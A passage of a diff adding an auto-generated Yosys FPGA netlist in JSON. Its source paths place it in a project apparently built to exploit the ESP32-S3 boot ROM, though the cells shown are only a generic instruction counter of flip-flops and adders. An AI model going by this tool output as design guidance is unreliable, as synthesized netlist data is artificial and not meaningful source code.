"I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 49 ], + "COUT": [ 50 ], + "I0": [ 27 ], + "I1": [ 48 ], + "I3": [ 28 ], + "SUM": [ 47 ] + } + }, + "instruction_counter_DFFE_Q_11": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 51 ], + "Q": [ 52 ] + } + }, + "instruction_counter_DFFE_Q_11_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 53 ], + "COUT": [ 49 ], + "I0": [ 27 ], + "I1": [ 52 ], + "I3": [ 28 ], + "SUM": [ 51 ] + } + }, + "instruction_counter_DFFE_Q_12": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 54 ], + "Q": [ 55 ] + } + }, + "instruction_counter_DFFE_Q_12_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 56 ], + "COUT": [ 53 ], + "I0": [ 27 ], + "I1": [ 55 ], + "I3": [ 28 ], + "SUM": [ 54 ] + } + }, + "instruction_counter_DFFE_Q_13": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 57 ], + "Q": [ 58 ] + } + }, + "instruction_counter_DFFE_Q_13_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 59 ], + "COUT": [ 56 ], + "I0": [ 27 ], + "I1": [ 58 ], + "I3": [ 28 ], + "SUM": [ 57 ] + } + }, + "instruction_counter_DFFE_Q_14": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 60 ], + "Q": [ 61 ] + } + }, + "instruction_counter_DFFE_Q_14_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 62 ], + "COUT": [ 59 ], + "I0": [ 27 ], + "I1": [ 61 ], + "I3": [ 28 ], + "SUM": [ 60 ] + } + }, + "instruction_counter_DFFE_Q_15": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 63 ], + "Q": [ 64 ] + } + }, + "instruction_counter_DFFE_Q_15_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 65 ], + "COUT": [ 62 ], + "I0": [ 27 ], + "I1": [ 64 ], + "I3": [ 28 ], + "SUM": [ 63 ] + } + }, + "instruction_counter_DFFE_Q_16": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 66 ], + "Q": [ 67 ] + } + }, + "instruction_counter_DFFE_Q_16_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 68 ], + "COUT": [ 65 ], + "I0": [ 27 ], + "I1": [ 67 ], + "I3": [ 28 ], + "SUM": [ 66 ] + } + }, + "instruction_counter_DFFE_Q_17": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 69 ], + "Q": [ 70 ] + } + }, + "instruction_counter_DFFE_Q_17_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 71 ], + "COUT": [ 68 ], + "I0": [ 27 ], + "I1": [ 70 ], + "I3": [ 28 ], + "SUM": [ 69 ] + } + }, + "instruction_counter_DFFE_Q_18": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 72 ], + "Q": [ 73 ] + } + }, + "instruction_counter_DFFE_Q_18_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 74 ], + "COUT": [ 71 ], + "I0": [ 27 ], + "I1": [ 73 ], + "I3": [ 28 ], + "SUM": [ 72 ] + } + }, + "instruction_counter_DFFE_Q_19": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 75 ], + "Q": [ 76 ] + } + }, + "instruction_counter_DFFE_Q_19_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 77 ], + "COUT": [ 74 ], + "I0": [ 27 ], + "I1": [ 76 ], + "I3": [ 28 ], + "SUM": [ 75 ] + } + }, + "instruction_counter_DFFE_Q_1_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 78 ], + "COUT": [ 79 ], + "I0": [ 27 ], + "I1": [ 46 ], + "I3": [ 28 ], + "SUM": [ 45 ] + } + }, + "instruction_counter_DFFE_Q_2": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 80 ], + "Q": [ 81 ] + } + }, + "instruction_counter_DFFE_Q_20": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 82 ], + "Q": [ 83 ] + } + }, + "instruction_counter_DFFE_Q_20_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 84 ], + "COUT": [ 77 ], + "I0": [ 27 ], + "I1": [ 83 ], + "I3": [ 28 ], + "SUM": [ 82 ] + } + }, + "instruction_counter_DFFE_Q_21": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 85 ], + "Q": [ 86 ] + } + }, + "instruction_counter_DFFE_Q_21_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 87 ], + "COUT": [ 84 ], + "I0": [ 27 ], + "I1": [ 86 ], + "I3": [ 28 ], + "SUM": [ 85 ] + } + }, + "instruction_counter_DFFE_Q_22": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 88 ], + "Q": [ 89 ] + } + }, + "instruction_counter_DFFE_Q_22_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 90 ], + "COUT": [ 87 ], + "I0": [ 27 ], + "I1": [ 89 ], + "I3": [ 28 ], + "SUM": [ 88 ] + } + }, + "instruction_counter_DFFE_Q_22_D_ALU_SUM_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 27 ], + "COUT": [ 90 ], + "I0": [ 28 ], + "I1": [ 91 ], + "I3": [ 28 ], + "SUM": [ 92 ] + } + }, + "instruction_counter_DFFE_Q_23": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 93 ], + "Q": [ 91 ] + } + }, + "instruction_counter_DFFE_Q_23_D_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "01" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:135.23-136.15" + }, + "port_directions": { + "F": "output", + "I0": "input" + }, + "connections": { + "F": [ 93 ], + "I0": [ 91 ] + } + }, + "instruction_counter_DFFE_Q_2_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 94 ], + "COUT": [ 78 ], + "I0": [ 27 ], + "I1": [ 81 ], + "I3": [ 28 ], + "SUM": [ 80 ] + } + }, + "instruction_counter_DFFE_Q_3": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 95 ], + "Q": [ 96 ] + } + }, + "instruction_counter_DFFE_Q_3_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 97 ], + "COUT": [ 94 ], + "I0": [ 27 ], + "I1": [ 96 ], + "I3": [ 28 ], + "SUM": [ 95 ] + } + }, + "instruction_counter_DFFE_Q_4": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 98 ], + "Q": [ 99 ] + } + }, + "instruction_counter_DFFE_Q_4_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 100 ], + "COUT": [ 97 ], + "I0": [ 27 ], + "I1": [ 99 ], + "I3": [ 28 ], + "SUM": [ 98 ] + } + }, + "instruction_counter_DFFE_Q_5": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 101 ], + "Q": [ 102 ] + } + }, + "instruction_counter_DFFE_Q_5_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 103 ], + "COUT": [ 100 ], + "I0": [ 27 ], + "I1": [ 102 ], + "I3": [ 28 ], + "SUM": [ 101 ] + } + }, + "instruction_counter_DFFE_Q_6": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 104 ], + "Q": [ 105 ] + } + }, + "instruction_counter_DFFE_Q_6_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 106 ], + "COUT": [ 103 ], + "I0": [ 27 ], + "I1": [ 105 ], + "I3": [ 28 ], + "SUM": [ 104 ] + } + }, + "instruction_counter_DFFE_Q_7": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56" + }, + "port_directions": { + "CE": "input", + "CLK": "input", + "D": "input", + "Q": "output" + }, + "connections": { + "CE": [ 42 ], + "CLK": [ 13 ], + "D": [ 107 ], + "Q": [ 108 ] + } + }, + "instruction_counter_DFFE_Q_7_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5" + }, + "port_directions": { + "CIN": "input", + "COUT": "output", + "I0": "input", + "I1": "input", + "I3": "input", + "SUM": "output" + }, + "connections": { + "CIN": [ 109 ], + "COUT": [ 106 ], + "I0": [ 27 ], + "I1": [ 108 ], + "I3": [ 28 ], + "SUM": [ 107 ] + } + }, + "instruction_counter_DFFE_Q_8": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "module_not_derived": "00000000000000000000000000000001", + "src": 